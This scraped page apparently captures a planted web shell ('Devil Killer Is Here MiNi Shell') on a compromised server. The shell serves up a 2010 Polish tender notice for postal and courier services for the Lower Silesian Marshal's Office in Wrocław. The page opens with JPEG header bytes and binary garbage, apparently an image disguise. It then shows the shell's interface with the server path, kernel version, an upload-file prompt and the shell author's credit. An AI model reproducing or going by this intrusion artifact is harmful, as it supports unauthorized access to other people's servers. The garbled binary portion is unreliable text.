JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24532-N-2010.html

<p class="kh_header"><b>Wrocław: USŁUGI POCZTOWE W ZAKRESIE PRZYJMOWANIA, PRZEMIESZCZANIA I DORĘCZANIA PRZESYŁEK POCZTOWYCH W KATEGORII WAGOWEJ POWYŻEJ 50 G REALIZOWANE DLA URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA DOLNOŚLĄSKIEGO</b><br>
<b>Numer ogłoszenia: 24532 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Dolnośląskie - Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 071 7769397,7769703-05,7779229, faks 071 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI POCZTOWE W ZAKRESIE PRZYJMOWANIA, PRZEMIESZCZANIA I DORĘCZANIA PRZESYŁEK POCZTOWYCH W KATEGORII WAGOWEJ POWYŻEJ 50 G REALIZOWANE DLA URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA DOLNOŚLĄSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  wykonywanie,  na rzecz  Urzędu Marszałkowskiego Województwa Dolnośląskiego we Wrocławiu, usług pocztowych niezastrzeżonych ustawą z dnia 12 czerwca 2003 r. Prawo Pocztowe, dla Poczty Polskiej S.A., w następującym zakresie: 

I
a)	Przyjmowanie do obrotu pocztowego przesyłek listowych krajowych i zagranicznych o wadze powyżej 50 g. 
Usługa polega na odebraniu od zamawiającego wszystkich przesyłek o wadze powyżej 50 g, przyjęcie ich do przemieszczenia i doręczenia adresatowi. Przesyłki będą podzielone na przesyłki rejestrowane i nierejestrowane. Zamawiający wymaga każdorazowego potwierdzenia nadania przesyłek rejestrowanych na kopii rejestru tych przesyłek - pocztowa książka nadawcza.
Usługa doręczenia powinna być wykonana w jak najkrótszym czasie , jednak nie dłużej niż pięć dni roboczych i trzy dni robocze przy przyśpieszeniu (priorytet) w kraju i do sześciu dni w Europie po dniu nadania.
b).	Przyjmowanie do obrotu pocztowego paczek krajowych i zagranicznych.
Usługa polega na odebraniu od zamawiającego, odpowiednio przygotowanych, tzn. opakowanych tak aby zawartość nie uległa uszkodzeniu, paczek, przyjęciu ich do przemieszczenia i doręczenie ich adresatowi. Doręczenie powinno być dokonane w jak najkrótszym czasie , jednak nie dłużej niż pięć dni roboczych i trzy dni robocze przy przyśpieszeniu (priorytet) w kraju i do sześciu dni w Europie po dniu nadania. Paczka jest przesyłką rejestrowaną i Zamawiający wymaga każdorazowego potwierdzenia ich nadania na kopii ich rejestru-pocztowa książka nadawcza. Wymienione usługi muszą mieć możliwość zastosowania dodatkowych opcji: 
 - potwierdzenie odbioru przez adresata
 - przesyłka przyśpieszona
 - priorytetowa
 - przesyłka wartościowa -przesyłka za pobraniem

II

Świadczenie usług kurierskich krajowych i zagranicznych.
Usługa  polega na odebraniu przesyłki każdorazowo po zgłoszeniu jej i dostarczeniu adresatowi w jak najkrótszym czasie. Jest to doręczenie tzw. od drzwi do drzwi. Wymagane terminy to :

teren miasta - w tym samym dniu co nadanie,
teren kraju - następny dzień po nadaniu z możliwością określenia godziny doręczenia w dużych miastach, 
Europa - do trzech dni po nadaniu
świat - od  pięciu do dziesięciu dni od dnia  nadania w zależności od  miejsca doręczenia.
Odbiór odbywa się za każdorazowym potwierdzeniem nadania jednak, dokumentem potwierdzającym nie musi być rejestr Zamawiającego, tylko dokument przewozowy nakładu Wykonawcy. 

Wykonawca zobowiązany jest do:

1.	Wykonywania powyższych usług w każdy dzień roboczy.
2.	Wykonawca doręcza przesyłki adresatowi lub osobie przez niego upoważnionej, wpisując odpowiednią adnotację na zwrotnym potwierdzeniu odbioru lub zestawieniu zbiorczym.
3.	W przypadku nie doręczenia przesyłki rejestrowanej za pierwszym razem Wykonawca zobowiązany jest do zostawienia adresatowi informacji o próbie doręczenia i możliwości jej odebrania w ciągu 14 dni..
4.	Przesyłki ostatecznie nie doręczone, wykonawca zwraca zamawiającemu  na podstawie spisu zwróconych przesyłek.
5.	Wykonawca bierze na siebie odpowiedzialność za przesyłki od momentu odebrania ich
od zamawiającego do doręczenia ich adresatowi lub zwrotu zamawiającemu w przypadku
ich nie doręczenia.
6.	Wykonawca zobowiązany jest zachować tajemnicę korespondencji, a dane osobowe
przetwarzać tylko w związku z rejestracją przesyłek.
7. Wykonawca nie ma prawa nanoszenia jakichkolwiek zmian w danych adresowych przesyłek ani otwierania ich.
8. Po sprawdzeniu zgodności wpisów danych adresowych, Wykonawca zobowiązany jest zwrócić kopię książki nadawczej zamawiającemu, jedna  nie później niż na następny dzień roboczy po przyjęciu przesyłek.
9.Przyjęcie przesyłek do obrotu pocztowego wykonawca każdorazowo potwierdza na
kopii pocztowej książki nadawczej pieczęcią z datownikiem i wpisuje liczbę przyjętych
przesyłek.
10.Wykonawca zobowiązany jest na wniosek zamawiającego, do prowadzenia postępowania reklamacyjnego przesyłki rejestrowanej w przypadku jej zaginięcia i lub braku zwrotnego potwierdzenia odbioru. Odpowiedź na reklamację winna być udzielona pisemnie w terminie do 30 dni od jej złożenia.
11.Zamawiający zastrzega sobie prawo do składania reklamacji przesyłki rejestrowanej
w obrocie krajowym w terminie do 12 miesięcy od dnia jej nadania oraz w terminie do 6
miesięcy dla przesyłek w obrocie zagranicznym.
12. Wykonawca odbiera przygotowaną do ekspedycji  korespondencję, w  każdy dzień
roboczy w godzinach od 15.00 do 15.30, z siedziby zamawiającego czyli z Urzędu Marszałkowskiego Województwa Dolnośląskiego ul. Wybrzeże Słowackiego 12/14, pokój nr 101 oraz z ul. Ostrowskiego 7 we Wrocławiu, pokój 219 .
13. Zamawiający zastrzega sobie prawo stosowania druków zwrotnego potwierdzenia
odbioru oraz pocztowej książki nadawczej, własnego nakładu sporządzonymi zgodnie ze
standardami pocztowymi.
14. Przy nadawaniu przesyłek wymagających dodatkowych informacji ponad te zawarte
w adresie (np. waga, zawartość, data doręczenia), zamawiający będzie umieszczał na
przesyłce, wypełnione druki nakładu wykonawcy, niezbędne do przyjęcia jej do obrotu
pocztowego (dot. to m.in. przesyłek kurierskich)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy Pzp oraz spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Pzp.

2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Zamawiający stwierdzi, że wykonawca spełnił warunki określone w art. 22 ust. 1 ustawy Pzp jeśli wykaże że:
a) posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj.: posiada uprawnienia do prowadzenia działalności pocztowej;
b) posiada wiedzę i doświadczenie, tj.: posiada doświadczenie polegające na wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, z należytą starannością, w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej jednej lub więcej usług polegających na przyjmowaniu do obrotu pocztowego przesyłek listowych krajowych i zagranicznych o wadze powyżej 50g oraz przyjmowaniu do obrotu pocztowego paczek krajowych i zagranicznych o łącznej wartości wszystkich usług min. 150.000,00 zł brutto. Wykazane usługi musza być poparte dokumentami potwierdzającymi, że zostały one wykonane lub są wykonywane należycie;
c) dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) znajduje sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił. 
Wykonawca, w zakresie wskazanym przez Zamawiającego, zobowiązany jest wykazać nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art.22 ust.1 ustawy Pzp, oraz brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art.24 ust.1 ustawy Pzp (art.26 ust.2a ustawy Pzp).

3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez podmioty wspólnie składające ofertę Zamawiający przyjmuje, że wymagania o których mowa w art. 22 ust. 1 pkt. 1-4  mogą spełniać tylko niektórzy z tych Wykonawców, tak by sumarycznie w odniesieniu do wszystkich tych Wykonawców były spełnione łącznie. 
4.	Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.
5.	Zamawiający wzywa do uzupełnienia oświadczeń, pełnomocnictw lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu na zasadach określonych art. 26 ust.3 Ustawy Pzp.
6.	Nie spełnienie któregokolwiek z ww. warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI.1. Na potwierdzenie spełniania opisanych warunków udziału w postępowaniu oraz wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Wykonawca jest zobowiązany złożyć niżej wymienione oświadczenia i dokumenty:
1. oświadczenie o spełnieniu warunków udziału z art. 22 ust.1 ustawy Pzp (wzór stanowi załącznik nr 2 do SIWZ),
2. oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 3 do SIWZ),
3. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Odpis musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy.
W przypadku gdy wykonawcą jest podmiot zobowiązany do rejestracji w Krajowym Rejestrze Sądowym, a w załączonym odpisie z rejestru nie uwzględniono zmian w tekście dokumentu, wykonawca dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia w sądzie rejestrowym ww. zmian. Wykonawcy, którzy dokonali zmian w zakresie organów zarządzających, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby);
4. zezwolenie na wykonywanie działalności pocztowej wydane przez Prezesa Urzędu Komunikacji Elektronicznej lub wpis do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej (nie dotyczy operatora publicznego jakim jest zgodnie z ustawą Poczta Polska);
5. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), usług określonych w rozdziale V pkt 2 lit. b z podaniem, ich wartości, przedmiotu, dat wykonania i odbiorców;
6. dokumenty potwierdzające, że usługi wymienione w wykazie, o którym mowa w ww. pkt. 5 zostały wykonane lub są wykonywane należycie.

VI.2. Wykonawcy, którzy wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polegają na zasobach innych podmiotów:
1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art.26 ust.2b ustawy Pzp).

VI.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego
1.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub do reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
3.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana 
za najkorzystniejszą, przed zawarciem umowy o realizację zamówienia są zobowiązani przedłożyć Zamawiającemu umowę regulującą współpracę tych Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie (umowę) zawierające w swojej treści co najmniej następujące postanowienia:
a)	zawiązania porozumienia co najmniej na czas nie krótszy niż czas trwania umowy,
b)	wskazanie Pełnomocnika,
c)	zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
d)	zakaz zmiany Partnerów (Wykonawców) wspólnie realizujących dane zamówienie publiczne w trakcie jego obowiązywania.

VI.4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa:
1) zamiast dokumentów, o których mowa w rozdz. VI.1 ppkt 3 SIWZ dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, (powinny być wystawione nie wcześniej niż, 6 miesięcy przed upływem terminu składania ofert  w postępowaniu o udzielenie zamówienia.);
2) Jeżeli w miejscu zamieszkania  osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu lub dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty te powinny być wystawione w terminach określonych odpowiednio powyżej w pkt 1). 
Dokumenty, są składane w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność  z oryginałem. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Pozostałe dokumenty z punktu VI Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umwd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 09:30, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław
pok. nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com